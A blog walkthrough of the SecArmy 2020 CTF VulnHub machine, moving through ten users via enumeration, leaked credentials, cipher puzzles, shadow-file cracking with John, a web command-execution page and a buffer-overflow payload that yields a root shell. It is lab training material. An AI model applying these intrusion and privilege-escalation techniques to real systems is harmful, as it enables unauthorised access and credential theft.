Posts SECARMY CTF
Post
Cancel

SECARMY CTF

This is a box created for Secarmy 2020 ctf during GrayHat containing 10 challenges inside it covering different topics from pentesting to crypto and pwn. This machine can be found on vulnhub

Enumeration

Running nmap we find 4 ports open :

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# nmap -p- -T5 192.168.1.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 17:41 CET
Nmap scan report for 192.168.1.41
Host is up (0.000093s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
MAC Address: 08:00:27:6C:A7:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds

UNO

Going to port 80 we find the following landing page

Web

Then running gobuster we find a hidden directory, /anon:

1
2
3
4
root@kali:~# gobuster dir -u http://192.168.1.41/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/javascript (Status: 301)
/anon (Status: 301)
/server-status (Status: 403)

Inspecting it source code we find user uno credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title>Totally Secret Directory</title>
</head>
<body>
<center><b style="font-size: 32px;">Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>
</b></center>
</body>
</html>

After accessing through ssh we find a file containing the credentials for user dos

1
2
3
4
uno@svos:~$ cat readme.txt
Head over to the second user!                                                                                                                                                               
You surely can guess the username , the password will be:                                                                                                                                   
4b3l4rd0fru705

DOS

Now that we have switched to dos we find a readme

1
2
3
dos@svos:~$ cat readme.txt                                                                                                                                                                  
You are required to find the following string inside the files folder:                                                                                                                      
a8211ac1853a1235d48829414626512a

So we can just read all the files and use grep to look for that string and show also a few lines above and below it

1
dos@svos:~/files$ cat * | grep -B 10 -A 10 a8211ac1853a1235d48829414626512a

From it we get

1
Look inside file3131.txt

Going to that file we find an string which seems to be base64 encoded

1
2
3
4
5
6
7
8
9
10
11
12
UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA

Then going to cyberchef we see it was a zip file and we can get the files contained inside it

Web

From todo.txt we get the following

1
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

TRES

When connecting to port 1337 we are asked for a token, so we can use the one obtained from the previous file

1
2
3
4
root@kali:~# nc 192.168.1.40 1337

 Welcome to SVOS Password Recovery Facility!
 Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

And we obtain user tres credentials

1
Here's your login credentials for the third user tres:r4f43l71n4j3r0

CUATRO

We find a txt file inside tres home’s directory which tells to reverse a linux binary

1
2
tres@svos:~$ cat readme.txt 
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU

Trying to run the binary we obtain an error

1
2
tres@svos:~$ ./secarmy-village 
./secarmy-village: error while loading shared libraries: libgo.so.16: cannot open shared object file: No such file or directory

So we can use strings to read some data from it and among its ouput we can retrieve cuatro user pass

1
2
tres@svos:~$ string secarmy-village
p3dr00l1v4r3z

CINCO

In cuatro directory we find a file telling about checking /justanothergallery

1
2
 cuatro@svos:~$ cat todo.txt 
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.

Going to the website we find the following landing page

Web

Then using gobuster we find /qr directory containing all qr codes

1
2
root@kali:~# gobuster dir -u http://192.168.1.41/justanothergallery/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/qr (Status: 301)

So we can do a bulk download of these qr codes by using wget :

1
2
3
4
5
6
7
8
9
10
root@kali:~#wget -r --no-parent http://192.168.1.41/justanothergallery/qr/
root@kali:~/192.168.1.41/justanothergallery/qr# ls
 image-0.png    image-17.png   image-24.png   image-31.png   image-39.png   image-46.png   image-53.png   image-60.png   image-68.png         'index.html?C=M;O=A'
 image-10.png   image-18.png   image-25.png   image-32.png   image-3.png    image-47.png   image-54.png   image-61.png   image-6.png          'index.html?C=M;O=D'
 image-11.png   image-19.png   image-26.png   image-33.png   image-40.png   image-48.png   image-55.png   image-62.png   image-7.png          'index.html?C=N;O=A'
 image-12.png   image-1.png    image-27.png   image-34.png   image-41.png   image-49.png   image-56.png   image-63.png   image-8.png          'index.html?C=N;O=D'
 image-13.png   image-20.png   image-28.png   image-35.png   image-42.png   image-4.png    image-57.png   image-64.png   image-9.png          'index.html?C=S;O=A'
 image-14.png   image-21.png   image-29.png   image-36.png   image-43.png   image-50.png   image-58.png   image-65.png   index.html           'index.html?C=S;O=D'
 image-15.png   image-22.png   image-2.png    image-37.png   image-44.png   image-51.png   image-59.png   image-66.png  'index.html?C=D;O=A'
 image-16.png   image-23.png   image-30.png   image-38.png   image-45.png   image-52.png   image-5.png    image-67.png  'index.html?C=D;O=D'

Then, we can just read the qr codes using zbar and a simple bash script for automating things

1
2
3
4
5
6
 #!/bin/bash
for i in $(ls -la | grep png)
 do 
  zbarimg -q $i 2>/dev/null
done

From the output we can get user cinco credentials

1
2
3
4
5
6
7
8
 QR-Code:the
QR-Code:credentials
QR-Code:for
QR-Code:solving
QR-Code:the
QR-Code:5th
QR-Code:user:
QR-Code:cinco:ruy70m35

SEIS

As usual we find another hint, this time telling to look for other directory

1
2
 cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house

So in the root directory we find a directory called cinco-secrets

1
2
3
4
5
6
cinco@svos:/cincos-secrets$ ls -la
total 16
dr-xr-xr-x  2 cinco root 4096 Oct  9 18:07 .
drwxr-xr-x 25 root  root 4096 Oct 18 14:42 ..
-rw-r--r--  1 cinco root   31 Oct  9 18:07 hint.txt
--w-------  1 cinco root 1876 Sep 27 15:46 shadow.bak

There we have a backup of the shadow file and a hint which makes reference to rockyou wordlist:

1
2
cinco@svos:/cincos-secrets$ cat hint.txt 
we will, we will, ROCKYOU..!!!

Now it can be easily cracked using John the Ripper, obtaining Hogwarts as the password.

1
2
3
4
5
6
7
root@kali:~# john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Hogwarts         (seis)

SIETE

In this case we are asked to visit /shellcmsdashboard

1
2
seis@svos:~$ cat readme.txt 
head over to /shellcmsdashboard webpage and find the credentials!

Going to the website we find this login page

Web

We can easily find the credentials in a comment of the robots.txt file

1
 # Username: admin Password: qwerty

After loggin in we are asked to visit /aabbzzee.php

Web

There we can execute commands as www-data. Running ls-la we find an interesting file readme9213.txt without reading permissions.

Web

But as it is owned by www-data we can give it permissions and read it obtaining next user password.

Web

OCHO

Now inside seven’s home we find a bunch of files and a zip file which is password protected

1
2
 siete@svos:~$ ls
flag7.txt  hint.txt  key.txt  message.txt  mighthelp.go  password.zip

The contents of the txt files are the following :

1
2
3
4
5
6
7
siete@svos:~$ cat hint.txt 
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt 
x
siete@svos:~$ cat message.txt 
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]

So it is a crypto challenge were we have a set of a numbers and an ascii key and we are looking for an ascii output, so it seems like XOR.

Going to https://www.dcode.fr/xor-cipher we insert the numbers for being decoded and ‘x’ as the decryption key and obtain the password of the zip file.

Web

From the zip file we obtain user ocho credentials

1
2
3
4
5
6
 siete@svos:~$ unzip password.zip 
Archive:  password.zip
[password.zip] password.txt password: 
 extracting: password.txt
 siete@svos:~$ cat password.txt 
the next user's password is m0d3570v1ll454n4

NUEVE

Now we find a packet capture file

1
2
ocho@svos:~$ ls
flag8.txt  keyboard.pcapng

We will transfer it to our machine for analyzing it with wireshark using scp

1
scp ocho@192.168.1.35:/home/ocho/keyboard.pcapng keyboard.pcapng

Following http stream from get /none.txt we get a bunch of text but in the middle of it we can find an encrypted message

Web

Taking into account the context of the challenge it seems like a keyboard shift cipher, so we can go to https://www.dcode.fr/keyboard-shift-cipher for decoding it

Web

There we obtain user nueve credentials

ROOT

This is the final challenge where we need to root the machine , inside nueve’s home we find a binary file and a funny readme :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
 nueve@svos:~$ ls
flag9.txt  orangutan  readme.txt
nueve@svos:~$ cat readme.txt 

                                      ,╓╓╖╗╗╗╗╖╖╓,
                                ,╓╗╬╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓@╗,
                             ╓@▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫@╖
                          ,╗▓╫╫╫▓▀▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╬╣╫╫╫╫@,
                        ,#╫╫╫▓▓░░░░╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫Ñ░░░╣▓╫╫╫▌µ
                     ,╗▓╫╫╫╫▓▀░░░░░░╩╫╫Ñ╫╫╫╫╫╫╫╫░╫╫Ñ░░░░░░╠▓▓╫╫╫╫@µ
                   ╓╬╫╫╫╫╫╫▓▌░░░░░╩"``   ╙╫╫╫╫M   ``"╨╦░░░░╠▓▓╫╫╫╫╫▓╗
                 ╓╣╫╫╫╫╫╫╫▓▓░░░░╩  ,╦NÑÑNÑ░╫╫Ñ░NÑÑN╦╥  ╙░░░░╟▓▓╫╫╫╫╫╫╫W
               ,╬╫╫╫╫╫╫╫╫▓▓▌░░░╨  ╦░░░▄▓▓▄░░░░╠▓▓▓▄░░Ñ  1░░░░▓▓╫╫╫╫╫╫╫╫▓µ
              ╔╫╫╫╫╫╫╫╫╫╫▓▓▒░░░░╦N░░░╙████░░░░║███▌░░░╦╦N░░░░▓▓╫╫╫╫╫╫╫╫╫╫@
             ╬╫╫╫╫╫╫╫╫╫╫╫▓▓M░░░░░░░░░░░╠╠░░░░░░╙╠░░░░░░░░░░░░╣▓▓╫╫╫╫╫╫╫╫╫╫▓
            ╬╫╫╫╫╫╫╫╫╫╫╫╫▀░░░░░░░░░░░░░░░░╬╫╬╫░░░░░░░░░░░░░░░░╠▓╫╫╫╫╫╫╫╫╫╫╫╫,
           ╬╫╫╫╫╫╫╫╫╫╫╫▓Ñ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╣╫╫╫╫╫╫╫╫╫╫╫╫
          ╟╫╫╫╫╫╫╫╫╫╫╫▓M░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓╫╫╫╫╫╫╫╫╫╫▓
         ╔╫╫╫╫╫╫╫╫╫╫╫▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓╫╫╫╫╫╫╫╫╫╫▌
         ╫╫╫╫╫╫╫╫╫╫╫▓▓▌░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫U
        ╟╫╫╫╫╫╫╫╫╫╫╫▓▓▓░░░░░░░░░╠▄▄░░░░░░░░░░░░░░░░░░░▄▄░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫▓
        ╫╫╫╫╫╫╫╫╫╫╫╣▓▓▓@░░░░░░░░╠███▓▄▄▄░░░░░░░░╠▄▄▄▓██▀░░░░░░░░╠▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫U
       ╟╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓░░░░░░░░░░╠▀▀████████████▀▀▀░░░░░░░░░░╟▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫▓
       ▓╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░µ╬▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫U
      J╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓╬µ░░░░░░░░░░░░░░░░░░░░░░░░µ▄╬▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫@
      ╟╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓@╬▄▄µ░░░░░░░░µµ▄▄╬▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
      ╣╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
      ╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
      ╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌ ╙╫╫╫╫╫╫╫╫M╣╬▀░░░╣▓▓▓▓▓▓▓Ñ░░╠▓M╣▓╫╫╫╫╫╫╫▀ ╙╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
     ]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡  ╫╫╫▓╩╠╣M░░░░░░░░╫╫╫╫╫╫Ñ░░░░░░░░╣╠╠╢╫╫╫H J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡
     ]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╔░░╠░░░░░░░░░░░░░╢╫╫╫╫╫░░░░░░░░░░░░░Ö░░N J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌
     ╞╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░░╫╫╫╫▌░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓
     ╟╫╫╫╫╫▓╣╣╣╣╣╫╫╫╫╫╡  1░░░░░░░░░░░░░░░░╣╫╫╫░░░░░░░░░░░░░░░░Ñ  J╫╫╫╫╫▓▓╣╣╣▓╫╫╫╫╫╫
     ╚╣░░░░░░░░░░░░░╠╠╡   1░░░░░░░░░░░░░░░╟╫╫╫░░░░░░░░░░░░░░░Ñ   J╬░░░░░░░░░░░░░░╠╬
     1░░░░░░░░░░░░░░░░H    1░░░░░░░░░░░░░░╫M▀╬░░░░░░░░░░░░░░H     ░░░░░░░░░░░░░░░░░
      ╙╨ª "╨╨``╨╨" ╚╨ª      1░░░░░░░░░░░░Ñ    1░░░░░░░░░░░░H      "╨╨``╨╨" ╚╨ª ª╨╨`
                             ╙░░░░░░░░░╨`      `ªÑ░░░░░░░░H
    
Can u feeeeeed my orangutan ^^

I executed the file and as it said it was a pwn file I sent a lot of ‘A’ to verify it was vulnerable to Buffer Overflow

1
2
3
4
5
nueve@svos:~$ ./orangutan 
hello pwner 
pwnme if u can ;) 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

Then I decided to decompile the code using ghidra

Web

From the C code we can see that the buffer length is 24 and then if the value of local_10 variable matches 0xcafebabe it spawns a root shell.

As the machine has installed python3 I went to my machine and created a simple script using python2 for generating the buffer that needs to be passed to the program:

1
2
3
4
from struct import *
res='A'*24
res+=pack('I',int('0xcafebabe',16))//Transforms to little endian
print (res)

Then I piped the output to a .txt file and uploaded to the machine through scp.

Finally we pipe the buffer to the program and execute another cat to read from stdin and feed it to the /bin/sh executed by the program. Obtaining a root shell.

1
2
3
4
5
6
7
nueve@svos:~$ (cat bof.txt;cat) | ./orangutan
hello pwner 
pwnme if u can ;) 
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)
This post is licensed under CC BY 4.0 by the author.